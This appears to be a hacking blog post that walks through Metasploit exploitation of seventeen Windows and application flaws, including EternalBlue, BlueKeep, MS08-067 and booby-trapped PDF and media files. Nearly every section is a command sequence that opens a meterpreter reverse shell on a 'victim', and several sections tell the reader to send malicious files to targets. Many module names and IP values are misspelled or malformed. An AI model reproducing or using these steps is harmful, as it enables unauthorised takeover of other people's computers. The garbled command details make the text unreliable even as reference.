Exploiting Windows Vulnerabilities Using Metsploit | Hacking Windows by Metasploit Framework | How to Hack Windows Operating System

 We know mostly people use window OS PC, laptop etc. because it is it easy to use. So, first we will discuss exploits to hack windows vulnerabilities. So, let’s start.

1)      EXPLOITING ORACLE MYSQL UDF VULNERABILITIES:

It gives meterpreter shell to control victim’s system completely. Run following commands;

(msfconsole)

(use exploit/windows/mysql/mysql_payload)

(show options)

(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4.)

(set USERNAME + username of target) e.g. (set USERNAME root)

(set PASSWORD + password target) e.g. (set PASSWORD toor)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(exploit)

2)      EXPLOITING ADOBE ACROBAT U3D MESH DECLARATION ARRAY OVERRUN VULNERABILITIES:

It also gives you full control of victim’s window system by meterpreter shell. So, run following commands to exploit this vulnerability;

(msfconsole)

(use exploit/windws/filesformat/adobe_u3d_meshdecl)

(show options)

(set CUTPUTPATH + path in victim’s system) e.g. (set CUTPUTPATH /home/asad)

(set PAYLOAD + payload to control victim’s system) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(exploit)

(use exploit/multiple/handler)

(set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST 192.168.8.4.)

(exploit -j)

(sessions -i 1)

Now you can control victim’s PC.

3)      EXPLOITING ADOBE ACROBAT GETLCON BUFFER OVERFLOW:

It is also a serious vulnerability that provides us meterpreter shell to control the victim’s window system. Run following commands in metasploit;

(msfconsole)

(use exploit/windws/filesformat/adobe_getlcon)

(set OUTPUTPATH + output path) e.g. (set OUTPUTPATH /home/ankit)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(exploit)

(use exploit/multiple/handler)

(set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST 192.168.8.4.)

(exploit -j)

(sessions -I 1)

4)      EXPLOIT ADOBE JBIG2DECODE MEMORY CORRUPTION VULNERABILITIES:

We can control the PC of over victim by exploiting this vulnerability by meterpreter shell. Run following commands in Metasploit to exploit this vulnerability.

(msfconsole)

(use exploit/windws/filesformat/adobe_jbi2decode)

(show options)

(set OUTPUTPATH + output path) e.g. (set OUTPUTPATH /home/ankit)

 (set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(exploit)

(use exploit/multiple/handler)

(set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST 192.168.8.4.)

(exploit -j)

(sessions -i 1)

5)      EXPLOITING SUN JAVA CELENDER DESERIALZE VULNERABILITY:

It also provide us meterpreter shell to control the system of victim. Run following commands in metasploit;

(use exploit/multiple/browser/java_celender_deserialze)

(show options)

(set SRVHOST + ip of your kali Linux) e.g. (set SRVHOST 192.168.1.0)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(exploit)

(sessions -I 1)

6)      EXPLOITING POC VULNERABILITY:

We can exploit this vulnerability to control windows PC of our target by using following commands in Metasploit;

(msfconsole)

(use exploit/windows/rdp/cve_2019_0708_bluekeep_rce)

(show options)

(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4.)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(show targets)

(set target + target number) e.g. (set target 3)

(exploit)

To use this exploit this vulnerability you should be connected to network of your victim.

7)      EXPLOITING ETERNAL BLUE VULNERABILITY:

We can exploit this vulnerability by using following commands in Metasploit;

(msfconsole)

(use exploit/windows/smb/ms17_010_enternalblue)

(show options)

(set processname explorer.exe)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(set verifyarch false) e.g. (set verifytarget false)

(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4.)

(exploit)

Meterpreter will open and you can control the system of target.

8)      EXPLOITING DOUBLE PULSAR VULNERABILITY:

We can exploit this vulnerability by using following commands in metasploit;

(msfconsole)

(use exploit/windows/smb/enternalblue_doublepulsar)

(show options)

(set TARGETARCHITECTURE + Architecture) e.g. (set TARGETARCHITECTURE x64)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(set PROCESSINJECT explorer.exe)

(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4.)

(exploit)

9)      EXPLOITING BLAZE DVD VULNERABILITY:

We can exploit this vulnerability by using following commands in Metasploit;

(msfconsole)

(use exploit/windows/fileformat/blazdvd_hdtv_bof)

 (show options)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(exploit)

(use exploit/multi/handler)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(exploit)

When you will set and exploit (blaze exploit) then a file will generate. Then send it to your victim and as victim will open this file then meterpreter shell will open and you can control the PC of your victim.

10)  EXPLOITING INTERNET EXPLORER 8:

We can exploit internet explorer 8 by using following commands in Metasploit;

(msfconsole)

(use exploit/windows/browser/ms11_003_css_important)

(show options)

(set SRVHOST + ip of kali Linux) e.g. (set SRVHOST 192.168.0.21)

(set SRVPORT + port to control) e.g. (set SRVHOST 80)

(set URIPATH + any path) e.g. (set URIPATH /)

(exploit)

(sessions -i 1)

11)  EXPLOITING WINDOWS XP SERVICE PACK 3:

We can exploit windows XP by using following commands in Metasploit;

(msfconsole)

(use exploit/windows/smb/ms08_067_netapi)

(show options)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(show options)

(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4.)

(set LPORT + port to control) e.g. (set LPORT 4444)

(exploit)

12)  EXPLOITING WINDOWS MEDIA CENTER VULNERABILITY:

It is mostly found in windows 8.1 and we can exploit it by using following commands in metasploit;

(msfconsole)

(use exploit/windows/fileformat/ms15_100_mcl_exe)

(show options)

(set SRVHOST + ip of kali Linux) e.g. (set SRVHOST 192.168.0.21)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(exploit)

Send msf.exe to your victim and as he/he will open it then meterpreter shell will open. Type in Linux;

(sessions -I 1)

13)  EXPLOITING WINDOW SERVER 2008 R2 VIA SMB VERSION 2;

We can exploit it by using following commands in Metasploit;

(msfconsole)

(use exploit/windows/smb/ms09_o50_smb2_negotiate_func_index)

(show options)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4.)

(set RPORT + target port of smb service) e.g. (set RPORT 445)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(set LPORT + port to control) e.g. (set LPORT 4444)

(exploit)

14)  EXPLOITING ADOBE PDF:

We can exploit adobe pdf by using following commands in metasploit;

(msfconsole)

 (use exploit/windows/fileformat/adobe_pdf_embedded_exe)

(show options)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(set LPORT + port to control) e.g. (set LPORT 4444)

(set infilename + path of virus file) e.g. (set infilename /root/desktop/yahoo.pdf)

(exploit)

Then send yahoo.pdf file to your victim and as victim will open it we will get meterpreter to control system of victim. Run following commands in Linux to control;

(msfconsole)

(use exploit/multi/handler)

(set LHOST 192.168.8.4.)

(set LPORT 4444)

(exploit)

15)  EXPLOITING WINDOWS 7_PROFESSIONAL:

We can exploit window 7-professional by using following commands in Metasploit;

(msfconsole)

(use exploit/windows/browser/ms13_031_svg_dashstyle)

(show targets)

(set TARGET + target number) e.g. (set TARGET 2)

(show options)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

 (exploit)

Then you can capture the browser detail of target.

16)  EXPLOITING VLC VULNERABILITY 2019:

We can exploit vlc 2019 of windows by using following commands in Metasploit;

(msfconsole)

(use exploit/windows/fileformat/vlc_mkv)

 (show options)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(exploit)

Send files to target.

(use exploit/multi/handler)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(exploit)

17)  EXPLOITING SYNC BREEZE VULNERABILITY;

We exploit this vulnerability by using following commands in metasploit;

(msfconsole)

(use exploit/windows/http/syncbreeze_bof)

(show options)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4.)

(exploit)

Post a Comment

Previous Post Next Post